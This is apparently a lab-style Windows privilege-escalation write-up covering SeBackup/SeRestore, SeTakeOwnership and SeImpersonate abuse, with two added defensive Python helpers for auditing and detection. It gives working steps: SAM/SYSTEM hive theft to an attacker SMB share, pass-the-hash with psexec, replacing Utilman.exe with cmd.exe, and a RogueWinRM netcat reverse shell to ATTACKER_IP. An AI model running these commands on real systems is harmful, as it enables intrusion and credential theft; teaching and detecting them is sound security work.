Abusing dangerous privileges
1 Abusing dangerous privileges
1.1 SeBackup/SeRestore abuse
1.2 SeTakeOwnership abuse
1.3 SeImpersonate/SeAssignPrimaryToken abuse
SeBackup/SeRestore abuse

This hack consists of copying the SAM and SYSTEM registry hives to extract the local Administrator’s password hash.
Check the currently assigned privileges with whoami /priv:
The current account (Backup) is part of the “Backup Operators” group, which by default is granted the SeBackup and SeRestore privileges. These privileges are only present in an elevated token, so open a command prompt with the “Open as administrator” option to use them.
Check privileges again:
C:\> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== ========
SeBackupPrivilege             Back up files and directories  Disabled
SeRestorePrivilege            Restore files and directories  Disabled
SeShutdownPrivilege           Shut down the system           Disabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
Back up the SAM and SYSTEM hives (the files that hold the hashes):
C:\> reg save hklm\system C:\Users\Backup\system.hive
The operation completed successfully.

C:\> reg save hklm\sam C:\Users\Backup\sam.hive
The operation completed successfully.
Copy these files to the attacker machine using SMB or any other available method. For SMB, use impacket’s smbserver.py to start a simple SMB server with a network share in the current directory:
# mkdir share
# python3 /opt/impacket/examples/smbserver.py -smb2support -username Backup -password <password of Backup> public share
Use the copy command in the Windows machine to transfer both files to the attack machine:
C:\> copy C:\Users\Backup\sam.hive \\<IP address attack machine>\public\
C:\> copy C:\Users\Backup\system.hive \\<IP address attack machine>\public\
Use impacket to retrieve the users’ password hashes:
# python3 /opt/impacket/examples/secretsdump.py -sam sam.hive -system system.hive LOCAL
Use the Administrator’s hash to perform a Pass-the-Hash attack and gain access to the target machine with impacket’s psexec.py:
# python3 /opt/impacket/examples/psexec.py -hashes aad3b435b51404eeaad3b435b51404ee:13a04cdcf3f7ec41264e568127c5ca94 administrator@<IP address target machine>
...
C:\Windows\system32> whoami
nt authority\system
SeTakeOwnership abuse

Open a command prompt using “Open as administrator” and check privileges:
C:\> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                              State
============================= ======================================== ========
SeTakeOwnershipPrivilege      Take ownership of files or other objects Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                 Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set           Disabled
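A small audit helper, added here as an example and not part of the original write-up, that parses whoami /priv output in the format shown in both listings above and flags the privileges this page treats as escalation paths (SeBackup, SeRestore, SeTakeOwnership, SeImpersonate, SeAssignPrimaryToken). The embedded sample is the Backup account's table from above.

```python
import re

# Privileges this page treats as escalation paths, with the abuse each enables.
DANGEROUS = {
    "SeBackupPrivilege": "read any file regardless of DACL (SAM/SYSTEM hive export)",
    "SeRestorePrivilege": "write any file regardless of DACL",
    "SeTakeOwnershipPrivilege": "take ownership of any object (e.g. Utilman.exe)",
    "SeImpersonatePrivilege": "impersonate clients that authenticate to the process",
    "SeAssignPrimaryTokenPrivilege": "assign another user's token to a new process",
}

# One table row of `whoami /priv`: name, description, state. The name column
# is exactly as wide as the longest privilege name, so a row may have only a
# single space between columns; anchor on the first and last tokens instead
# of splitting on runs of whitespace.
ROW = re.compile(r"^(Se\w+Privilege)\s+(.+?)\s+(Enabled|Disabled)$")


def parse_whoami_priv(text):
    """Return {privilege name: 'Enabled'|'Disabled'} from `whoami /priv` output."""
    privs = {}
    for line in text.splitlines():
        m = ROW.match(line.strip())
        if m:
            privs[m.group(1)] = m.group(3)
    return privs


def dangerous_privileges(text):
    """Dangerous privileges held by the token, sorted by name. A 'Disabled'
    state is not a mitigation: the holder can enable the privilege at will."""
    return sorted(p for p in parse_whoami_priv(text) if p in DANGEROUS)


# Constructed sample: the Backup account's listing from the write-up above.
SAMPLE = """\
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== ========
SeBackupPrivilege             Back up files and directories  Disabled
SeRestorePrivilege            Restore files and directories  Disabled
SeShutdownPrivilege           Shut down the system           Disabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
"""

if __name__ == "__main__":
    for name in dangerous_privileges(SAMPLE):
        print(f"{name}: {DANGEROUS[name]}")
```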
Utilman is a built-in Windows application used to provide Ease of Access options on the lock screen. It runs with SYSTEM privileges, so we can gain SYSTEM privileges by replacing the original binary with any payload. Because we can take ownership of any file, replacing it is trivial.
Take ownership of Utilman.exe:
C:\> takeown /f C:\Windows\System32\Utilman.exe
SUCCESS: The file (or folder): "C:\Windows\System32\Utilman.exe" now owned by user "WINPRIVESC2\thmtakeownership".
Give the user you are logged in as full permissions over Utilman.exe:
C:\> icacls C:\Windows\System32\Utilman.exe /grant THMTakeOwnership:F
processed file: Utilman.exe
Successfully processed 1 files; Failed processing 0 files
Replace utilman.exe with a copy of cmd.exe:
C:\Windows\System32\> copy cmd.exe utilman.exe
1 file(s) copied.
To trigger utilman, lock the screen from the start button, then click on the “Ease of Access” button, which runs the replaced utilman.exe as SYSTEM:
C:\Windows\system32> whoami
nt authority\system
SeImpersonate/SeAssignPrimaryToken abuse

Consider an FTP service running as the user ftp. Without impersonation, if a user (Ann) logs into the FTP server and tries to access her files, the FTP service would try to access them with its own access token rather than Ann’s. With the ftp token used like this, we must manually configure specific permissions for each served file/directory, and the ftp user ends up with access to all files. If the FTP service were compromised at some point, the attacker would immediately gain access to all folders to which the ftp user has access.
If instead the FTP service’s user has the SeImpersonate or SeAssignPrimaryToken privilege, all of this is simplified a bit, as the FTP service can temporarily grab the access token of the user logging in and use it to perform any task on their behalf. If we manage to take control of a process with SeImpersonate or SeAssignPrimaryToken privileges, we can impersonate any user connecting and authenticating to that process.
Plant a web shell on the target web server at http://<IP address target>/. Use the web shell to check the privileges assigned to the compromised account and confirm it holds both privileges of interest (SeImpersonatePrivilege and SeAssignPrimaryTokenPrivilege).
Transfer RogueWinRM to the target machine. The RogueWinRM exploit is possible because whenever a user (including unprivileged users) starts the BITS service in Windows, it automatically creates a connection to port 5985 using SYSTEM privileges. Port 5985 is typically used by the WinRM service, which exposes a PowerShell console to be used remotely over the network.
Start a netcat listener:
# nc -lvp 4442
Use the web shell to trigger the RogueWinRM exploit:
c:\tools\RogueWinRM\RogueWinRM.exe -p "C:\tools\nc64.exe" -a "-e cmd.exe ATTACKER_IP 4442"
The -p parameter specifies the executable to be run by the exploit, which is nc64.exe in this case. The -a parameter is used to pass arguments to that executable. The exploit may take up to 2 minutes to work, so the browser may appear unresponsive for a bit.
c:\windows\system32\inetsrv> whoami
nt authority\system
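Detection logic for the three techniques above, added here as an example and not part of the original write-up: each rule is a regex over a process-creation command line (in practice the CommandLine field of Sysmon Event ID 1 or Security Event ID 4688), run over constructed sample events. The event dictionary shape, the user names and the 10.0.0.5 address are assumptions made for the example.

```python
import re

# Detection rules: name plus a case-insensitive regex over the process
# command line. Patterns mirror the commands shown in this write-up.
RULES = [
    ("sam_system_hive_export",
     r"\breg(\.exe)?\s+save\s+hklm\\(sam|system)\b"),
    ("takeown_on_system32_binary",
     r"\btakeown(\.exe)?\s+/f\s+\S*\\system32\\"),
    ("icacls_grant_on_system32_binary",
     r"\bicacls(\.exe)?\s+\S*\\system32\\\S+\s+/grant\b"),
    ("utilman_replaced_with_cmd",
     r"\bcopy\s+\S*cmd\.exe\s+\S*utilman\.exe\b"),
    ("roguewinrm_reverse_shell",
     r"roguewinrm.*-p\s+\S*nc(64)?\.exe.*-e\s+cmd\.exe"),
]
COMPILED = [(name, re.compile(pattern, re.IGNORECASE)) for name, pattern in RULES]


def match_command_line(cmd):
    """Names of all rules whose pattern occurs in one command line."""
    return [name for name, rx in COMPILED if rx.search(cmd)]


def scan_events(events):
    """Return (rule, user, command_line) for every event that trips a rule.
    Events are dicts with 'user' and 'command_line' keys (assumed shape)."""
    return [(name, ev["user"], ev["command_line"])
            for ev in events
            for name in match_command_line(ev["command_line"])]


# Constructed sample events: the commands from this page plus one benign query.
SAMPLE_EVENTS = [
    {"user": "WINPRIVESC2\\Backup", "command_line": r"reg save hklm\sam C:\Users\Backup\sam.hive"},
    {"user": "WINPRIVESC2\\Backup", "command_line": r"reg save hklm\system C:\Users\Backup\system.hive"},
    {"user": "WINPRIVESC2\\thmtakeownership", "command_line": r"takeown /f C:\Windows\System32\Utilman.exe"},
    {"user": "WINPRIVESC2\\thmtakeownership", "command_line": r"icacls C:\Windows\System32\Utilman.exe /grant THMTakeOwnership:F"},
    {"user": "WINPRIVESC2\\thmtakeownership", "command_line": r"copy cmd.exe utilman.exe"},
    {"user": "IIS APPPOOL\\DefaultAppPool", "command_line": r'C:\tools\RogueWinRM\RogueWinRM.exe -p "C:\tools\nc64.exe" -a "-e cmd.exe 10.0.0.5 4442"'},
    {"user": "WINPRIVESC2\\alice", "command_line": r"reg query hklm\software\microsoft\windows\currentversion"},
]

if __name__ == "__main__":
    for rule, user, cmd in scan_events(SAMPLE_EVENTS):
        print(f"[{rule}] {user}: {cmd}")
```

Command-line rules are a cheap first signal; a hive export by a Backup Operators member or a new owner on a System32 binary also leaves object-access and ownership-change events that corroborate the hit.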
Privileges are rights that an account has to perform specific system-related tasks. These tasks range from shutting down the machine to bypassing some DACL-based access controls.
The SeBackup and SeRestore privileges allow users to read and write to any file in the system, ignoring any DACL in place. The idea behind these privileges is to allow certain users to perform backups of a system without requiring full administrative privileges. With this power, an adversary can trivially escalate privileges on the system using many techniques.
The SeTakeOwnership privilege allows a user to take ownership of any object on the system, including files and registry keys, opening up many possibilities for an attacker to elevate privileges. For example, search for a service running as SYSTEM and take ownership of the service’s executable.
The SeImpersonate and SeAssignPrimaryToken privileges allow a process to impersonate other users and act on their behalf. Impersonation usually consists of being able to spawn a process or thread under the security context of another user.